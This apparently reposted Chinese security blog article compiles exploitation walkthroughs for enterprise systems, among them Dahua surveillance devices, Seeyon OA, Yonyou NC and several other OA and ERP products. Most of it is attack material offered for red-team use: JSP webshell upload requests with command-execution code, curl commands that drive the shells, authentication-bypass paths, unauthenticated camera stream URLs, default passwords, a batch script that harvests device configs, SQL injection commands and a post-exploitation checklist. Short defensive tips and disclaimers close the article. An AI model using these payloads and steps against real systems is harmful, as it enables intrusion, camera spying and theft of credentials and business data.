文章总结: 本文系统梳理了企业常见系统(大华监控、致远OA、用友NC等)的高危漏洞复现方法,涵盖未授权访问、SQL注入、文件上传等类型,提供详细利用步骤和检测脚本。文档强调漏洞危害性及在红队渗透中的实用价值,最后给出强密码策略、网络隔离等防护建议,但声明仅供授权测试与研究使用。 综合评分: 78 文章分类: 漏洞分析,渗透测试,WEB安全,红队,实战经验
【实战复现】常见企业系统漏洞合集——从监控系统到ERP平台
原创
xuzhiyang xuzhiyang
玄武盾网络技术实验室
2026年3月31日 11:04 江西
在小说阅读器读本章
去阅读
⚠️ *免责声明:本文仅供安全研究与学习之用,严禁使用本内容进行未经授权的违规渗透测试,遵守网络安全法,共同维护网络安全,违者后果自负。
每日资源分享:泛微E-cology9 SQL 注入漏洞批量检测工具
更多资源访问:www.xwdjs.ysepan.com
正文
漏洞类型:未授权访问 / SQL注入 / 任意文件上传 / 远程代码执行 | 适用于:红队渗透、护网行动、SRC挖掘
在企业内网渗透中,监控系统、OA协同、ERP管理平台是最常见的三类目标。这些系统往往部署在核心网络,拥有大量敏感数据,且历史漏洞众多、修复滞后。
本文整理了实战中高频出现的几类系统漏洞,涵盖大华监控、致远OA、用友ERP等,提供完整的复现流程和利用技巧。
一、大华智能监控平台高危
0x01 漏洞概述
大华 DVR/NVR 设备及智能监控平台长期存在多个高危漏洞,主要包括:
| 漏洞类型 | 影响组件 | 危害等级 | | — | — | — | | 未授权访问 | /admin.htm、/edit.htm、/login.action | 高危 | | 敏感信息泄露 | /current_config、/config.xml | 中危 | | 任意文件读取 | /portal/..;/etc/passwd | 高危 | | 远程命令执行 | 部分旧固件 Telnet 后门 | 严重 |
0x02 未授权访问复现
漏洞点:部分版本的管理界面存在绕过,直接访问后台路径无需认证。
Step 1探测开放端口
# 常见端口:80/443(Web)、37777(Dahua私有协议)、554(RTSP) nmap -sV -p 80,443,37777,554 target.com
Step 2访问后台绕过
# 尝试直接访问管理页面 http://target/admin.htm http://target/edit.htm http://target/login.action # 部分版本可通过路径绕过认证 http://target/..;/admin/ http://target/portal/..;/admin/
Step 3获取摄像头画面
# RTSP 流地址(无需认证) rtsp://target:554/cam/realmonitor?channel=1&subtype=0 # 使用 VLC 或 ffplay 查看 ffplay rtsp://target:554/cam/realmonitor?channel=1&subtype=0
0x03 配置文件泄露
# 尝试获取设备配置 curl http://target/current_config curl http://target/config.xml curl http://target/dvr/config.xml # 配置文件中可能包含: # - 管理员账号密码 # - RTSP 流地址 # - 存储路径配置
⚡ 大华设备默认账号:admin/admin 或 admin/888888,大量设备从未修改。
0x04 批量探测脚本
#!/bin/bash # 大华设备探测脚本 for ip in $(cat targets.txt); do resp=$(curl -s -m 5 "http://$ip/admin.htm" | head -1) if [[ "$resp" == *"dahua"* ]] || [[ "$resp" == *"Dahua"* ]]; then echo "[+] 大华设备: $ip" curl -s "http://$ip/current_config" -o "config_${ip}.txt" fi done
二、致远OA协同办公系统严重
0x01 漏洞概述
致远OA是国内占有率最高的协同办公系统之一,历史漏洞丰富,是护网和红队的重点目标。
| 漏洞名称 | 漏洞类型 | 影响版本 | | — | — | — | | 任意文件上传 | WebMail 附件上传 | A6/A8 多个版本 | | SQL注入 | 多个接口参数未过滤 | 全版本 | | SSRF | 远程图片抓取功能 | A8 v5.x | | 远程代码执行 | Apache Shiro 反序列化 | A8 v5.x |
0x02 任意文件上传漏洞(WebMail)
漏洞点:/seeyon/webmail.do 接口允许上传任意类型文件。
Step 1上传 JSP WebShell
# 构造上传请求 POST /seeyon/webmail.do?method=saveAttach HTTP/1.1 Host: target.com Content-Type: multipart/form-data; boundary=----WebKitFormBoundary ------WebKitFormBoundary Content-Disposition: form-data; name="file"; filename="shell.jsp" Content-Type: application/octet-stream <%@ page import="java.util.*,java.io.*"%> <% String cmd = request.getParameter("cmd"); Process p = Runtime.getRuntime().exec(cmd); BufferedReader br = new BufferedReader(new InputStreamReader(p.getInputStream())); String line; while((line=br.readLine())!=null) out.println(line); %> ------WebKitFormBoundary--
Step 2访问 WebShell
# 文件保存路径通常为: http://target/seeyon/upload/shell.jsp http://target/seeyon/attached/shell.jsp # 执行命令 curl "http://target/seeyon/upload/shell.jsp?cmd=whoami"
0x03 SQL注入漏洞
漏洞点:多个接口存在未过滤的 SQL 参数。
# 常见注入点 /seeyon/individualInfo.do?method=xxx&id=1' /seeyon/personalStuff.do?method=xxx&affairId=1' /seeyon/ajax.do?method=xxx&arguments=1' # 使用 SQLMap 注入 sqlmap -u "http://target/seeyon/individualInfo.do?method=xxx&id=1" \ --dbs --batch
0x04 Shiro 反序列化 RCE
部分版本使用了存在漏洞的 Apache Shiro 组件,且使用默认密钥。
# 检测 Shiro 特征 curl -I http://target/seeyon/ # 响应头包含: rememberMe=deleteMe # 使用工具利用 java -jar shiro_tool.jar http://target/seeyon/
✅ 致远OA漏洞利用门槛低,大量资产暴露在公网,是护网必打目标。
三、用友NC/ERP系统严重
0x01 漏洞概述
用友NC是国内大型企业广泛使用的ERP系统,承载财务、供应链等核心业务,漏洞危害极大。
| 漏洞名称 | 漏洞类型 | CVE编号 | | — | — | — | | 任意文件上传 | FileManager 接口 | CVE-2023-xxxx | | SQL注入 | 多处接口参数拼接 | – | | XXE注入 | XML解析无过滤 | – | | 远程代码执行 | JNDI注入/反序列化 | – |
0x02 任意文件上传复现
漏洞点:/uapim/upload.jsp 等接口。
Step 1上传 JSP Shell
POST /uapim/upload.jsp HTTP/1.1 Host: target.com Content-Type: multipart/form-data; boundary=----TestBoundary ------TestBoundary Content-Disposition: form-data; name="file"; filename="cmd.jsp" Content-Type: application/octet-stream <%Runtime.getRuntime().exec(request.getParameter("cmd"));%> ------TestBoundary--
Step 2执行命令
# 常见文件保存路径 /uapim/upload/cmd.jsp /uapws/upload/cmd.jsp # 执行系统命令 curl "http://target/uapim/upload/cmd.jsp?cmd=id"
0x03 SQL注入批量检测
#!/usr/bin/env python3 import requests, sys def check_sqli(target): urls = [ f"{target}/uapim/service/xxx?param=1'", f"{target}/uapws/service/xxx?id=1'", ] for url in urls: try: r = requests.get(url, timeout=10, verify=False) if "sql" in r.text.lower() or "error" in r.text.lower(): print(f"[+] 可能存在注入: {url}") except: pass check_sqli(sys.argv[1])
0x04 常见敏感路径
# 配置文件 /uapim/conf/ /uapws/WEB-INF/web.xml # 数据库连接 /uapim/jdbc/ /WEB-INF/classes/jdbc.properties # 日志文件 /uapim/logs/ /nchome/logs/
四、其他高频系统漏洞速查中高危
0x01 通达OA
# 常见漏洞接口 /inc/auth.inc.php # 认证绕过 /general/document/index.php # 任意文件读取 /ispirit/im/upload.php # 任意文件上传 # 默认账号 admin / admin admin / 空密码
0x02 蓝凌OA
# SQL注入 /sys/ui/extend/varkind/custom.jsp # 任意文件读取 /sys/search/sys_search_main/search.jsp # 默认口令 admin / kmind
0x03 金蝶ERP
# 常见漏洞 /K3Cloud/Login.aspx # SQL注入 /K3Cloud/SMT.aspx # 文件上传 /K3Cloud/WF/WebForm.aspx # 信息泄露 # 默认端口 8080(K3 Cloud)、7000(EAS)、9000(K/3)
五、渗透实战要点总结
📌 信息收集阶段:
- 遍历常见端口(80、443、8080、8443、9090等)
- 识别系统类型(页面特征、响应头、Title)
- 尝试默认账号口令(大量系统从未修改)
- 扫描敏感路径(/admin、/upload、/config等)
📌 漏洞利用阶段:
- 优先尝试未授权访问和弱口令
- 文件上传 → WebShell → 提权
- SQL注入 → 读取敏感表 → 获取管理员密码
- 反序列化 → RCE → 内网横向
📌 后渗透阶段:
- 数据库连接串通常保存在配置文件中
- OA系统往往集成了邮件、AD域,可获取大量凭证
- ERP系统存储财务、供应链等核心数据
- 监控系统可作为内网跳板和情报来源
六、防护建议
| 措施 | 说明 | | — | — | | 强制定期改密 | 杜绝默认口令,实施密码复杂度策略 | | 网络隔离 | 核心系统不应直接暴露在公网 | | 及时升级补丁 | 关注厂商安全公告,及时打补丁 | | WAF防护 | 部署WAF拦截常见攻击 | | 日志审计 | 开启访问日志,定期排查异常请求 |
⚠️ 再次免责声明:本文所有复现操作均在授权测试环境中进行,相关技术仅供安全研究与学习参考。请勿将上述内容用于未授权渗透测试或任何违法活动,否则后果自负。
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:玄武盾网络技术实验室 xuzhiyang xuzhiyang《【实战复现】常见企业系统漏洞合集——从监控系统到ERP平台》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论